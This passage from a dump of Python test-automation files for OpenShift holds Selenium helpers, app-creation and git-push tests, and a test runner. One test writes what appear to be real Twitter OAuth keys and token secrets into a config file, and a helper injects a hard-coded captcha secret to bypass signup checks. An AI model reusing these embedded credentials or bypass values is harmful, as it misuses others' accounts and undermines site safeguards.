parser.add_option(\"--testrun_id\", dest=\"testrun_id\",default=False,\n help=\"testrun_id for web automated test cases\")\n (options, args) = parser.parse_args()\n if options.url != None: baseutils.update_config_file('environment','url', options.url)\n if options.browser != None:baseutils.update_config_file('environment','browser', options.browser)\n if options.browserpath != None:baseutils.update_config_file('environment','browserpath',options.browserpath)\n if options.proxy != None: baseutils.update_config_file('environment', 'proxy', options.proxy)\n if options.new_user != None:baseutils.update_config_file('environment','new_user',options.new_user)\n #if config.proxy:\n # baseutils.update_config_file('environment','libra_server',\"stg.rhcloud.com\")\n #else:\n # baseutils.update_config_file('environment','libra_server',\"dev.rhcloud.com\")\n if options.resultfile != None: baseutils.update_config_file('output','resultfile',options.resultfile)\n if options.title != None:baseutils.update_config_file('output','title',options.title)\n if options.description != None:baseutils.update_config_file('output','description',options.description)\n\n runner = TCMSTestRunner.TCMSTestRunner(testrun_id=options.testrun_id)\n#we should load it here...\n ret=runner.run(testrun_suite(options.testrun_id))\n sys.exit(ret)\n \n \n\n \n \n\n\n" }, { "alpha_fraction": 0.6536841988563538, "alphanum_fraction": 0.6557894945144653, "avg_line_length": 34.185184478759766, "blob_id": "dc309a3b39080a74d24ccedff3690cb70da12e63", "content_id": "c165bcaf551d97723784ef2ae40bd533a32f4186", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1900, "license_type": "no_license", "max_line_length": 111, "num_lines": 54, "path": "/automation/open/testmodules/RT/quick_start/quick_start_tweetstream.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartTweetstream(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"jbossas\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Tweetstream\"\n self.config.git_upstream_url = \"git://github.com/openshift/tweetstream-example.git\"\n self.config.page = \"/pages/home.jsf\"\n self.config.page_pattern = [ \"TweetStream\", \"Top Tags\", \"Top Tweeters\" ]\n \n def post_configuration_steps(self):\n self.log_info(\"Steps after configuration\")\n properties_file = self.config.application_name + \"/tweetstream/src/main/resources/twitter4j.properties\"\n self.info(\"Editing file: \" + properties_file)\n properties = open(properties_file, \"w\")\n properties.write(\"oauth.consumerKey=WYWyn60DsoDDkSmy3AGhw\\n\")\n properties.write(\"oauth.consumerSecret=uveHeAnasRBdJJevbl04P2nsqeZRxXM8HYqAyL2Vc\\n\")\n properties.write(\"oauth.accessToken=331629113-X53jKX8CcdgBxu1oqfx9dYBj8iEQ8wBuxjKiPok4\\n\")\n properties.write(\"oauth.accessTokenSecret=uTLdLwM5uoLepV4kyNUtPXUg0xc7MZKOeHBicBhw\\n\")\n properties.close()\n \n def pre_deployment_steps(self):\n self.log_info(\"Steps before deployments\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git add .\",\n \"git commit -a -m configuration\"\n ]\n common.command_get_status(\" && \".join(steps))\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartTweetstream)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5881233215332031, "alphanum_fraction": 0.5961172580718994, "avg_line_length": 38.19403076171875, "blob_id": "c144bb8d41f0e1c4d893c87280ca7e08d7c1557d", "content_id": "135b603d3d2cf041cfd01c85ce0b2b327cc5cdbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5254, "license_type": "no_license", "max_line_length": 136, "num_lines": 134, "path": "/automation/open/testmodules/RT/cartridge/stop_start_app_upon_git_push.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\nimport os,sys,re,time,subprocess\n\nimport proc\nimport OSConf\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"Stop Start appliaction upon git push\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` as default\")\n self.test_variant = 'php'\n\n self.app_name = self.test_variant.split('-')[0] + \"stopstart\"\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n self.app_type = common.app_types[self.test_variant]\n\n self.steps_list = []\n\n common.env_setup()\n common.clean_up(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n\n def finalize(self):\n pass\n\nclass StopStartAppUponGitPush(OpenShiftTest):\n\n def test_method(self):\n # 1. Create an app\n self.steps_list.append(testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 2.Custom git hook\n hook_file_path = \"%s/.openshift/action_hooks/build\" % (self.git_repo)\n key_string = \"sleep 30\"\n testcode = \"\"\"\n#!/bin/bash\nset -x\necho \"%s\"\necho \"Waiting for stop to finish\"\n%s\n\"\"\" %(key_string, key_string)\n cmd = \"echo '%s' >> %s; chmod +x %s\" % (testcode, hook_file_path,hook_file_path)\n self.steps_list.append(testcase.TestCaseStep(\"2.Custom git hook\",\n cmd,\n expect_description=\".openshift/action_hooks/build modified successfully\",\n expect_return=0))\n\n def create_proc(self, cmd):\n self.proc = proc.Proc(cmd)\n\n\n # 3.Git push in a subprocess\n self.steps_list.append(testcase.TestCaseStep(\"3.Git push in a subprocess(No Check)\",\n create_proc,\n function_parameters=[self, \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),],\n expect_description=\"Git push should be started\"))\n\n # 4.Waiting for stop to finish\n def grep_output(self, t, x, y):\n return self.proc.grep_output(t, x, y)\n\n self.steps_list.append(testcase.TestCaseStep(\"4.Waiting for stop to finish\",\n grep_output,\n function_parameters=[self, r\"Waiting for stop to finish\", 2 ,20],\n expect_description=\"app stop should succeed\",\n expect_return=0))\n\n # 5.Check if the key_string exists in the output\n self.steps_list.append(testcase.TestCaseStep(\"5.Check if the '%s' exists in the output\" % (key_string),\n grep_output,\n function_parameters=[self, key_string, 2, 20],\n expect_description=\"'%s' should be found in the output\" % (key_string),\n expect_return=0))\n\n # 6.Check app is unavailable before git push finish\n test_html = \"Service Temporarily Unavailable\"\n self.steps_list.append(testcase.TestCaseStep(\"6.Check app is unavailable before git push finish\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 2, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n # 7.Wait for git push to finish\n def wait(self, x, y):\n return self.proc.wait(x,y)\n\n self.steps_list.append(testcase.TestCaseStep(\"7.Wait for git push to finish\",\n wait,\n function_parameters=[self, 5, 10],\n expect_description=\"git push should finish within given time and return 0\",\n expect_return=0))\n\n # 8.Check app is available after git push\n test_html = \"Welcome to OpenShift\"\n self.steps_list.append(testcase.TestCaseStep(\"8.Check app is available after git push\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 5, 8],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(StopStartAppUponGitPush)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6438068747520447, "alphanum_fraction": 0.6438068747520447, "avg_line_length": 25.943395614624023, "blob_id": "1fa6ebe0e30960fde1fb37c415145ae64d4b47c8", "content_id": "59d26a75b2bc16805890c15e3b4817786ea10451", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1429, "license_type": "no_license", "max_line_length": 77, "num_lines": 53, "path": "/automation/get_run_tests.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\n\nfrom robot.conf import RobotSettings\nfrom robot.running import TestSuite\nfrom robot import run_cli\n\n\ndef get_available_test_suites(source):\n settings = RobotSettings()\n suite = TestSuite([os.path.abspath(source)], settings)\n return list(get_test_suites(suite))\n\ndef get_tests(suite):\n for s in suite.suites:\n for t in get_tests(s):\n yield t\n for t in suite.tests:\n yield t\n\ndef get_test_suites(suite):\n for s in suite.suites:\n for test_suite in get_test_suites(s):\n yield test_suite\n if suite.tests:\n yield suite\n\ndef write_argument_file(tests):\n with open('the_args.txt', 'w') as out:\n for t in tests:\n case_name = t.longname.replace(' ', '')\n out.write('--test %s\\n' % case_name)\n\ndef get_available_tests(source):\n settings = RobotSettings()\n suite = TestSuite([os.path.abspath(source)], settings)\n return list(get_tests(suite))\n\ndef execute_runner_script(source):\n #print runner, '--argumentfile the_args.txt'\n run_cli(['--argumentfile', 'the_args.txt', source]) \n\ndef execute(source):\n ava_tests = get_available_tests(source)\n write_argument_file(ava_tests)\n execute_runner_script(source)\n\n\nif __name__ == '__main__':\n source = os.path.join(os.path.dirname(__file__), 'WebDemo', 'xgao_tests')\n test_suites = get_available_tests(source)\n print test_suites\n\n execute(source)\n\n" }, { "alpha_fraction": 0.6350184679031372, "alphanum_fraction": 0.6418002247810364, "avg_line_length": 33.88172149658203, "blob_id": "a41b10807520fe77cf733ce990c140cde727cd96", "content_id": "3a92a9ce38d4812d4c155244d00ec928c8a61158", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3244, "license_type": "no_license", "max_line_length": 210, "num_lines": 93, "path": "/automation/open/testmodules/RT/node/app_creation_without_domain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\n\"\"\"\nAttila Nagy\[email protected]\nMay 9, 2012\n\n[US1876] App creation should fail without domain\n\"\"\"\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport re\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.current_domain = common.get_domain_name()\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n common.create_domain(common.getRandomString(10), self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n\nclass AppCreationWithoutDomain(OpenShiftTest):\n def test_method(self):\n\n if self.current_domain is not None and self.current_domain != '':\n try:\n common.command_get_status(\"rhc domain delete %s -l %s -p '%s' %s\" % ( self.current_domain, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n except:\n return self.failed(\"Unable to destroy domain.\")\n else:\n self.info(\"Domain doesn't exist, no need to destroy it.\")\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Trying to create an application without an existing domain\",\n common.create_app,\n function_parameters = [ self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = \"Operation must fail\",\n expect_return = \"!0\"\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Creating a domain name\",\n common.create_domain,\n function_parameters = [ common.getRandomString(10), self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd ],\n expect_description = \"Domain must be created successfully\",\n expect_return = 0,\n expect_string_list = [ \"You may now create an application\" ]\n ))\n \n self.steps_list.append(testcase.TestCaseStep(\n \"Creating an application\",\n common.create_app,\n function_parameters = [ self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = \"The application must be created successfully\",\n expect_return = 0\n ))\n\n case=testcase.TestCase(\"[US1876] App creation should fail without domain\",self.steps_list)\n case.run()\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppCreationWithoutDomain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7070434093475342, "alphanum_fraction": 0.7130818963050842, "avg_line_length": 38.67441940307617, "blob_id": "65b8c262fc2f47005893369146a7101c102deb46", "content_id": "682385b4112d5eab2724d0728d0f56fc5309aeb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22191, "license_type": "no_license", "max_line_length": 122, "num_lines": 559, "path": "/automation/open/lib/baseutils.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nimport unittest, time, re\nimport logging\nimport config\nimport ConfigParser\n\n\n\n\nlogging.basicConfig(filename='seleniumtest.log',format='%(levelname)s:%(message)s',level=logging.DEBUG)\n#url=\"https://stg.openshift.redhat.com/\"\n#logging.info('So should this')\n#logging.warning('And this, too')\n\ndef initiate(classself):\n\ttmp_browser=config.browser.strip().lower()\n\tif tmp_browser == 'firefox':\n\t\tif config.proxy == False:\n\t\t\tclassself.driver = webdriver.Firefox()\n\t\t\tif config.browserpath != '0':\n\t\t\t\t classself.binary = FirefoxBinary(config.browserpath)\n\t\t\t\t classself.driver = webdriver.Firefox(classself.binary)\n\t\telif config.proxy == True:\n\t\t\tclassself.profile=webdriver.FirefoxProfile()\n\t\t\tclassself.profile.set_preference(\"network.proxy.type\", 1)\n\t\t\tclassself.profile.set_preference(\"network.proxy.http\", \"file.sjc.redhat.com\")\n\t\t\tclassself.profile.set_preference(\"network.proxy.http_port\", 3128)\n\t\t\tclassself.profile.set_preference(\"network.proxy.ssl\", \"file.sjc.redhat.com\")\n\t\t\tclassself.profile.set_preference(\"network.proxy.ssl_port\", 3128)\n\t\t\tclassself.driver = webdriver.Firefox(classself.profile)\n\t\t\tif config.browserpath !='0':\n\t\t\t\t classself.binary = FirefoxBinary(config.browserpath)\n\t\t\t\t classself.driver = webdriver.Firefox(classself.profile,classself.binary)\n\telif tmp_browser == 'ie':\n\t\tclassself.driver = webdriver.Ie()\n\telif tmp_browser == 'chrome':\n\t\tclassself.driver = webdriver.Chrome()\n\telse :\n\t logging.warning(tmp_browser+'is not supported')\n\t \n\tif config.browserpath != '0' and tmp_browser == 'chrome':\n\t\tclassself.driver = webdriver.Chrome(executable_path=config.browserpath)\n\tclassself.driver.implicitly_wait(20)\n\tclassself.base_url =config.url\n\tclassself.verificationErrors = []\n#\tbasedriver=classself.driver\n\n\ndef is_element_present(classself, how, what):\n try: classself.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n\ndef assert_contain_text_by_id(classself,text,id_name):\n _retry=120\n while(_retry>0):\n _retry=_retry-1\n time.sleep(1)\n try:\n # if classself.driver.find_element_by_id(id_name).text.find(text) != -1 : break\n if text in classself.driver.find_element_by_id(id_name).text : break\n except: pass\n time.sleep(1)\n else:classself.fail(\"the text is not displayed yet\")\n\ndef assert_contain_text_by_css(classself,text,css_name):\n _retry=120\n while(_retry>0):\n _retry=_retry-1\n time.sleep(1)\n try:\n# if classself.driver.find_element_by_css(css_name).text.find(text) != -1 : break\n if text in classself.driver.find_element_by_css(css_name).text : break\n except: pass\n time.sleep(1)\n else:classself.fail(\"the text is not displayed yet\")\n\ndef assert_contain_text_by_xpath(classself,text,xpath):\n _retry=60\n while(_retry>0):\n _retry=_retry-1\n time.sleep(1)\n try:\n # if classself.driver.find_element_by_xpath(xpath).text.find(text) != -1 : break\n if text in classself.driver.find_element_by_xpath(xpath).text : break\n except: pass\n time.sleep(1)\n else:classself.fail(\"the text is not displayed yet\")\n\n\ndef is_element_displayed(classself,how,what):\n try:classself.assert_true(classself.driver.find_element(by=how,value=what).is_displayed(),what+\" is not displayed\")\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_element_hidden(classself,how,what):\n try:classself.assert_false(classself.driver.find_element(by=how,value=what).is_displayed())\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef wait_element_not_displayed_by_id(classself,id_name):\n try:\n WebDriverWait(classself.driver,120).until(classself.driver.find_element_by_id(id_name))\n classself.assert_true(classself.driver.find_element_by_id(id_name).is_displayed())\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_displayed(classself,text,css):\n try:\n WebDriverWait(classself.driver, 100).until(classself.driver.find_element_by_css_selector(css))\n classself.assert_true( text == classself.driver.find_element_by_css_selector(css).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_displayed_by_id(classself,text,id_name):\n try:\n WebDriverWait(classself.driver, 100).until(classself.driver.find_element_by_id(id_name))\n classself.assert_true( text == classself.driver.find_element_by_id(id_name).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\n\ndef check_title(classself,title):\n time.sleep(5)\n for i in range(60):\n try:\n if title == classself.driver.title: break\n except: pass\n time.sleep(1)\n else:classself.fail(\"time out,%s is not equal %s\" %(title,classself.driver.title));\n\n\ndef assert_element_present_by_css(classself,css):\n\ttry: classself.assert_true(is_element_present(classself,By.CSS_SELECTOR,css))\n\texcept AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_not_present_by_css(classself,css):\n try: classself.assert_false(is_element_present(classself,By.CSS_SELECTOR,css))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_id(classself,idname):\n\ttry: classself.assert_true(is_element_present(classself,By.ID,idname))\n\texcept AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_not_present_by_id(classself,idname):\n try: classself.assert_false(is_element_present(classself,By.ID,idname))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_xpath(classself,xpath):\n\ttry: classself.assert_true(is_element_present(classself,By.XPATH,xpath))\n\texcept AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_link_text(classself,link_text):\n try: classself.assert_true(is_element_present(classself,By.LINK_TEXT,link_text))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_partial_link_text(classself,partial_link_text):\n try: classself.assert_true(is_element_present(classself,By.PARTIAL_LINK_TEXT ,partial_link_text))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_element_present_by_name(classself,name):\n try: classself.assert_true(is_element_present(classself,By.NAME ,name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_class_name(classself,class_name):\n try: classself.assert_true(is_element_present(classself,By.CLASS_NAME ,class_name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_tag_name(classself,tag_name):\n try: classself.assert_true(is_element_present(classself,By.TAG_NAME ,tag_name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_element_present(classself,how,what):\n try: classself.assert_true(is_element_present(classself,how ,what))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_equal_by_css(classself,text,css,msg=None):\n try: classself.assertEqual(text,classself.driver.find_element_by_css_selector(css).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_text_equal_by_xpath(classself,text,xpath):\n try: classself.assertEqual(text,classself.driver.find_element_by_xpath(xpath).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_equal_by_partial_link_text(classself,text,partial_link_text):\n try: classself.assertEqual(text,classself.driver.find_element_by_partial_link_text(partial_link_text).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_text_equal_by_id(classself,text,id_name):\n try: classself.assertEqual(text,classself.driver.find_element_by_id(id_name).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_regexp_match_by_css(classself,text,css):\n try: classself.assertRegexpMatches(classself.driver.find_element_by_css_selector(css).text,text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_value_equal_by_id(classself,value,id_name):\n try: classself.assertEqual(value,classself.driver.find_element_by_id(id_name).get_attribute(\"value\"))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_equal_by_css(classself,text,css):\n for i in range(60):\n try:\n if text == classself.driver.find_element_by_css_selector(css).text: break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not equal to %s\" %(text,classself.driver.find_element_by_css_selector(css).text))\n\ndef is_text_equal_by_xpath(classself,text,xpath):\n for i in range(60):\n try:\n if text == classself.driver.find_element_by_xpath(xpath).text: break\n except: pass\n time.sleep(1)\n else:classself.fail(\"time out,%s is not equal to %s\" %(text,classself.driver.find_element_by_xpath(xpath).text))\n\n\n\n \n\n# for i in range(240):\n# try:\n# if not classself.driver.find_element_by_id(id_name).is_displayed(): break\n# except: pass\n# time.sleep(1)\n# else: classself.fail(\"time out\")\n\n#def wait_element_not_displayed_by_id(classself,id_name):\n # wait_element_not_present(classself,By.ID,id_name)\n \n\ndef wait_element_present_by_xpath(classself,xpath):\n for i in range(60):\n try:\n if is_element_present(classself,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(xpath))\n\ndef wait_element_not_present_by_xpath(classself,xpath):\n for i in range(60):\n try:\n if not is_element_present(classself,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is present\"%(xpath))\n\ndef wait_element_present_by_css(classself,css):\n for i in range(60):\n try:\n if is_element_present(classself,By.CSS_SELECTOR, css): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(css))\n\ndef wait_element_present_by_id(classself,idname):\n for i in range(60):\n try:\n if is_element_present(classself,By.ID, idname): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(idname))\n\ndef wait_element_present_by_class(classself,class_name):\n for i in range(60):\n try:\n if is_element_present(classself,By.CLASS_NAME,class_name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(class_name))\n\ndef wait_element_present_by_name(classself,name):\n for i in range(60):\n try:\n if is_element_present(classself,By.NAME,name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(name))\n\ndef wait_element_present_by_link_text(classself,name):\n for i in range(60):\n try:\n if is_element_present(classself,By.LINK_TEXT,name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(name))\n\n\ndef click_element_by_css(classself,css):\n wait_element_present_by_css(classself,css)\n classself.driver.find_element_by_css_selector(css).click()\n\ndef click_element_by_id(classself,id_name):\n wait_element_present_by_id(classself,id_name)\n classself.driver.find_element_by_id(id_name).click()\n\ndef click_element_by_xpath(classself,xpath):\n wait_element_present_by_xpath(classself,xpath)\n classself.driver.find_element_by_xpath(xpath).click()\n\ndef click_element_by_xpath_wait(classself,xpath):\n wait_element_present_by_xpath(classself,xpath)\n classself.driver.find_element_by_xpath(xpath).click()\n time.sleep(8)\n\ndef click_element_by_link_text(classself,link_text):\n wait_element_present_by_link_text(classself,link_text)\n classself.driver.find_element_by_link_text(link_text).click()\n \n\ndef click_element_by_class(classself,class_name):\n wait_element_present_by_class(classself,class_name)\n classself.driver.find_element_by_class_name(class_name).click()\n\n\ndef click_element_by_css_no_wait(classself,css):\n classself.driver.find_element_by_css_selector(css).click()\n\ndef click_element_by_id_no_wait(classself,id_name):\n classself.driver.find_element_by_id(id_name).click()\n\ndef click_element_by_xpath_no_wait(classself,xpath):\n classself.driver.find_element_by_xpath(xpath).click()\n\ndef click_element_by_partial_link_text_no_wait(classself,partial_link_text):\n classself.driver.find_element_by_partial_link_text(partial_link_text).click()\n\ndef go_to_home(classself):\n# basedriver=classself.driver\n classself.driver.get(classself.base_url+\"/app/\")\n# time.sleep(10)\n check_title(classself,\"OpenShift by Red Hat\")\n \n\ndef go_to_express(classself):\n express_page=classself.base_url+\"/app/express\"\n classself.driver.get(express_page)\n '''\n# go_to_home(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Express\")\n\ndef go_to_express_quick_start(classself):\n quick_start=classself.base_url+\"/app/express#quickstart\"\n classself.driver.get(quick_start)\n\n\ndef go_to_flex(classself):\n# go_to_home(classself)\n flex_page=classself.base_url+\"/app/flex\"\n classself.driver.get(flex_page)\n '''\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n check_title(classself,\"OpenShift by Red Hat | Express\")\n scroll_bar(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Flex')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Flex\")\n\n\ndef go_to_power(classself):\n# go_to_home(classself)\n power_page=classself.base_url+\"/app/power\"\n classself.driver.get(power_page)\n '''\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n check_title(classself,\"OpenShift by Red Hat | Express\")\n scroll_bar(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Power')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Power\")\n\ndef go_to_signin(classself):\n #click_element_by_class(classself,\"sign_in\")\n # time.sleep(5)\n click_element_by_link_text(classself,\"Sign in\")\n #is_element_displayed(classself,By.ID,\"login-form\")\n is_element_displayed(classself,By.ID,\"login_input\")\n\n\ndef go_to_signup(classself):\n # scroll_bar(classself)\n #signup_page=classself.base_url+\"/app/user/new/express\"\n go_to_home(classself)\n scroll_to_bottom(classself)\n click_element_by_xpath(classself,\".//*[@id='bottom_signup']/div/a\")\n time.sleep(2)\n if not is_element_displayed(classself,By.ID,\"signup\"):\n click_element_by_xpath(classself,\".//*[@id='bottom_signup']/div/a\")\n #click_element_by_link_text(classself,\"Sign up and try it\")\n #click_element_by_xpath(classself,\".//*[@id='opener']/div/a\")\n# click_element_by_css(classself,\"a.button.sign_up\")\n is_element_displayed(classself,By.ID,\"signup\")\n\n\n\ndef go_to_express_console(classself):\n# basedriver=classself.driver\n classself.driver.get(classself.base_url+\"/app/dashboard\")\n# time.sleep(10)\n #check_title(classself,\"OpenShift by Red Hat\")\n\n\ndef go_to_partners(classself):\n partner_page=classself.base_url+\"/app/partners\"\n classself.driver.get(partner_page)\n check_title(classself,\"OpenShift by Red Hat | Meet Our Partners\")\n\ndef go_to_legal(classself):\n legal_page=classself.base_url+\"/app/legal\"\n classself.driver.get(legal_page)\n check_title(classself,\"OpenShift by Red Hat | Terms and Conditions\")\n classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n\n\ndef go_to_platformoverview(classself):\n go_to_home(classself)\n click_element_by_link_text(classself,\"Platform Overview\")\n check_title(classself,\"OpenShift by Red Hat | Cloud Platform\")\n \ndef go_back(classself):\n classself.driver.back()\n time.sleep(5)\n\ndef input_by_id(classself,id_name,input_content):\n classself.driver.find_element_by_id(id_name).clear()\n classself.driver.find_element_by_id(id_name).send_keys(input_content)\n\n\ndef input_by_name(classself,name,input_content):\n classself.driver.find_element_by_name(name).clear()\n classself.driver.find_element_by_name(name).send_keys(input_content)\n\ndef input_by_xpath(classself,xpath,input_content):\n classself.driver.find_element_by_xpath(xpath).clear()\n classself.driver.find_element_by_xpath(xpath).send_keys(input_content)\n\n\ndef set_captcha(classself):\n classself.driver.execute_script(\"\"\"\n var input_ele = window.document.createElement('input');\n input_ele.setAttribute('type','hidden');\n input_ele.setAttribute('name','captcha_secret');\n input_ele.setAttribute('value','zvw5LiixMB0I4mjk06aR');\n var dialog = window.document.getElementById('signup');\n dialog.getElementsByTagName('form')[0].appendChild(input_ele);\"\"\"\n )\n\n\n\ndef register_a_user(classself,username,password,confirmpassword=\"0\",captcha=False):\n if confirmpassword == \"0\":\n confirmpassword =password\n #wait_element_present_by_id(classself,\"web_user_email_address\")\n input_by_id(classself,\"web_user_email_address\",username)\n input_by_id(classself,\"web_user_password\",password)\n input_by_id(classself,\"web_user_password_confirmation\",confirmpassword)\n if captcha:\n set_captcha(classself)\n classself.driver.find_element_by_id(\"web_user_submit\").click()\n \n\ndef login(classself,username,password):\n wait_element_present_by_id(classself,\"login_input\")\n input_by_id(classself,\"login_input\",username)\n input_by_id(classself,\"pwd_input\",password)\n classself.driver.find_element_by_css_selector(\"input.button\").click()\n time.sleep(5)\n\ndef login_by_form(classself,username,password):\n wait_element_present_by_xpath(classself,\"//div[@id='login-form']/form/label/input\")\n input_by_xpath(classself,\"//div[@id='login-form']/form/label/input\",username)\n input_by_xpath(classself,\"//div[@id='login-form']/form/label[2]/input\",password)\n classself.driver.find_element_by_css_selector(\"input.button\").click()\n time.sleep(5)\n\ndef login_by_window(classself,username,password):\n 